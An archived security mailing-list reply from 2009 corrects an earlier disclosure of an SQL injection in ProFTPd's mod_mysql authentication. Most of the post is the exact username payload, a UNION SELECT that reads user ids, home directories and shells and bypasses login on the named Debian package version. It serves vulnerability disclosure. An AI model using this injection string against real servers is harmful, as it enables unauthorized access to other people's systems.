Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)
From: gat3way@xxxxxxxxxx
Date: Wed, 11 Feb 2009 00:20:56 -0700

Uh-oh, sorry, bad copy-paste..the user is just

%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 

not 

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 

I am using debian packaged proftpd 1.3.1-16 if that matters.

Prev by Date: ProFTPd with mod_mysql Authentication Bypass Exploit
Next by Date: [ MDVSA-2009:035 ] gstreamer0.10-plugins-good
Previous by thread: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)
Next by thread: Craft Silicon Banking@Home SQL Injection
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux